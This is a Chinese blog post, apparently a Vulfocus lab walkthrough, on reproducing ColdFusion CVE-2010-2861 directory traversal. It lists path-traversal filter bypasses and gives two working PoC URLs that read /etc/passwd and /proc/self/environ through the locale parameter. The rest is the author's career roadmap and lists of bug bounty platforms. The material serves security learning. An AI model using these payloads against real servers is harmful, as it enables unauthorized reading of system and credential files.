【漏洞复现-coldfusion-文件读取】vulfocus/coldfusion-cve_2010_2861
前言:
介绍:
博主:网络安全领域狂热爱好者(承诺在CSDN永久无偿分享文章)。
殊荣:CSDN网络安全领域优质创作者,2022年双十一业务安全保卫战-某厂第一名,某厂特邀数字业务安全研究员,edusrc高白帽,vulfocus、攻防世界等平台排名100+、高校漏洞证书、cnvd原创漏洞证书等。
擅长:对于技术、工具、漏洞原理、黑产打击的研究。
C站缘:C站的前辈,引领我度过了一个又一个技术的瓶颈期、迷茫期。
导读:
面向读者:对于网络安全方面的学者。
本文知识点(读者自测):
(1)存在目录的穿越读取(√)
让读者如虎添翼
文件读取复现博文 目标 状态 【漏洞复现-druid-任意文件读取】vulfocus/druid-cve_2021_36749 URL中未对恶意输入进行限制 已发布 【漏洞复现-coldfusion-文件读取】vulfocus/coldfusion-cve_2010_2861 存在目录的穿越读取 已发布 【漏洞复现-rails-文件读取】vulfocus/rails-cve_2019_5418 路径穿越读取文件 已发布 2023年将更新更多,敬请期待 —— ——
目录
一、靶场环境
1.1、平台:
1.2、知识:
1.3、描述:
二、漏洞验证
2.1、分析:
2.4、解题:
一、靶场环境
1.1、平台:
Vulfocus 漏洞威胁分析平台
123.58.224.8:22547
1.2、知识:
1、%00(截断)
当检测时,需要特殊后缀或结尾时,可以使用截断
2、跳目录
../上一级
(有时候可能需要考虑绕过过滤)
单次过滤:....//
正则匹配斜杠:..%252f(双重URL编码,因为浏览器会解码一次)
起始路径匹配:起始路径+相对路径结合绕过
后缀检测:空字节绕过(%00截断)../etc/passwd%00.png
3、未授权
使用bp插件检测未授权访问
4、locale
根据计算机用户所使用的语言,所在国家或者地区,以及当地的文化传统所定义的一个软件运行时的语言环境
……
1.3、描述:
存在目录遍历+未授权访问
二、漏洞验证
2.1、分析:
/CFIDE/administrator/
(可以依次点击CFIDE--->administrator进入)
初始化页面,输入密码`admin`,开始初始化整个环境
/CFIDE/administrator/enter.cfm
(其实漏洞点就在这个地方)
POC1:
/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../etc/passwd%00en
####################
别继续点击Continue
后面初始化完成就无法利用这个漏洞点了
点击OK
2.4、解题:
get flag
POC2:
/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../proc/self/environ%00en
网络安全三年之约
First year
掌握各种原理、不断打新的靶场
目标:edusrc、cnvd
主页 | 教育漏洞报告平台 (sjtu.edu.cn)https://src.sjtu.edu.cn/https://www.cnvd.org.cnhttps://www.cnvd.org.cn/
second year
不断学习、提升技术运用技巧,研究各种新平台
开始建立自己的渗透体系
目标:众测平台、企业src应急响应中心
众测平台 URL 漏洞盒子 漏洞盒子 | 互联网安全测试众测平台 火线安全平台 火线安全平台 漏洞银行 BUGBANK 官方网站 | 领先的网络安全漏洞发现品牌 | 开放安全的提出者与倡导者 | 创新的漏洞发现平台 360漏洞众包响应平台 360漏洞云漏洞众包响应平台 补天平台(奇安信) 补天 - 企业和白帽子共赢的漏洞响应平台,帮助企业建立SRC 春秋云测 首页 雷神众测(可信众测,安恒) 雷神众测 - BountyTeam 云众可信(启明星辰) 云众可信 - 互联网安全服务引领者 ALLSEC ALLSEC 360众测 360众测平台 看雪众测(物联网) https://ce.kanxue.com/ CNVD众测平台 网络安全众测平台 工控互联网安全测试平台 CNCERT工业互联网安全测试平台 慢雾(区块链) Submit Bug Bounty - SlowMist Zone - Blockchain Ecosystem Security Zone 平安汇聚 http://isrc.pingan.com/homePage/index
互联网大厂 URL 阿里 https://asrc.alibaba.com/#/ 腾讯 https://security.tencent.com/ 百度 https://bsrc.baidu.com/v2/#/home 美团 https://security.meituan.com/#/home 360 https://security.360.cn/ 网易 https://aq.163.com/ 字节跳动 https://security.bytedance.com/ 京东 https://security.jd.com/#/ 新浪 http://sec.sina.com.cn/ 微博 https://wsrc.weibo.com/ 搜狗 http://sec.sogou.com/ 金山办公 https://security.wps.cn/ 有赞 https://src.youzan.com/
Third Year
学习最新的知识,建全自己的渗透体系
目标:参与护网(每一个男孩子心中的梦想)
时间:一般5月面试,6/7月开始(持续2-3周)
分类:国家级护网、省级护网、市级护网、重大节日护网(如:建党、冬奥等)
【漏洞复现-coldfusion-文件读取】vulfocus/coldfusion-cve_2010_2861相关推荐
- 目录浏览(目录遍历)漏洞和任意文件读取/下载漏洞
目录 目录浏览(目录遍历)漏洞 任意文件读取/下载漏洞 目录浏览(目录遍历)漏洞 目录浏览漏洞是由于网站存在配置缺陷,导致网站目录可以被任意浏览,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件 ...
- 漏洞复现 a.WSO2 文件上传 (CVE-2022-29464)
附件二:漏洞详情提交文件模板 1.漏洞描述 CVE-2022-29464 是 Orange Tsai发现的 WSO2 上的严重漏洞.该漏洞是⼀种未经身份验证的⽆ 限制任意⽂件上传,允许未经身份验证的攻 ...
- CVE-2020-1938 幽灵猫( GhostCat ) Tomcat-Ajp协议 任意文件读取/JSP文件包含漏洞分析
title: CVE-2020-1938 幽灵猫( GhostCat ) Tomcat-Ajp协议 任意文件读取/JSP文件包含漏洞分析 date: 2021-05-19 01:07:08 categ ...
- glassfish任意文件读取漏洞
glassfish任意文件读取漏洞 1.简介 1.1.漏洞类型 1.2.漏洞成因 1.3.语法搜索 1.4.影响版本 2.漏洞复现 2.1.POC 2.2.访问地址 2.3.GlassFish的敏感目 ...
- CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞
CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞 目录 漏洞原理 漏洞信息 受影响版本 FOFA搜集相关资产 漏洞分析&漏洞复现 解决方案 漏洞原理 Grafana是一 ...
- windows文件读取 xxe_java xxe漏洞
一.XXE漏洞简介 1.XXE(XML外部实体注入,XML External Entity) ,在应用程序解析XML输入时,当允许引用外部实体时,可构造恶意内容,导致读取任意文件.探测内网端口.攻击内 ...
- index.php.bak 颓废_CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现
CVE-2018-12613-phpmyadmin4.8.1远程文件包含漏洞复现 By:Mirror王宇阳 漏洞原理 攻击者利用发现在服务器上包含(查看和潜在执行)文件的漏洞.该漏洞来自一部分代码,其 ...
- 【MetInfo任意文件读取】--任意文件读取漏洞
文章目录 漏洞信息 一.漏洞产生的原因 二.漏洞利用 1.对靶机网址进行burp抓包 2.对上述请求包进行修改 三.漏洞修复与绕过--四种修复与绕过 1.置空../和./ 2.对$dir进行判断 3. ...
- CTFer成长之路之任意文件读取漏洞
任意文件读取漏洞CTF 任意文件读取漏洞 afr_1 题目描述: 暂无 docker-compose.yml version: '3.2'services:web:image: registry.cn ...
- Web漏洞-任意文件读取漏洞
任意文件读取漏洞 原理 任意文件读取是属于文件操作漏洞的一种,通过提交专门设计的输入,攻击者就可以在被访问的文件系统中读取或写入任意内容,往往能够使攻击者从服务器上获取敏感文件,正常读取的文件没有经过 ...
最新文章
- Linux下三个密码生成工具
- 【Flutter】遇见错误
- 如何用Java创建ZIP文档?
- ECMAScript5 ES5
- 我们注意到您的计算机目前处于离线状态_如何将您的计算机添加到Pekka网络
- python高维向量的可视化_Tensorboard教程:高维向量可视化
- oralce 笔记
- Python 之字符串常用方法
- Yann LeCun, Geoffrey E. Hinton, and Yoshua Bengio
- KITTI自动驾驶数据集可视化教程
- 【计算机网络复习 数据链路层】3.2 封装成帧和透明传输
- [NOIP2015] 运输计划
- 九、Linux 软件包安装
- 自动生成java代码_自动生成代码
- android 骨骼动画教程,使用DragonBones开发FLASH骨骼动画入门教程
- 《自拍教程48》Python_adb随机地图移图2小时
- AR入门之动画的制作与导入
- Python学习推荐
- 近年图像翻译先进模型小结
- 零基础学SQL(二、MYSQL数据类型)
热门文章
- java毕业生设计学生课堂互动教学系统计算机源码+系统+mysql+调试部署+lw
- 电脑死机是什么原因及解决方法
- c# SharpPcap 截包,抓包 - 资料收集贴 --转
- 武威市教师职称计算机考试,关于高级教师职称评定述职报告(精选5篇)
- html5图片并列排版,图片并列排版实现
- 4、docker中设置elasticsearch、kibana用户名密码、修改密码
- 程序员需要掌握的单词
- 编译linux搭建vs2015,使用Vs2015开发linux(centos7)程序
- DNS大全(114DNS 、阿里DNS、百度DNS 、360 DNS、Google DNS)
- PHP 将XML转成数组(微信回调接收方法)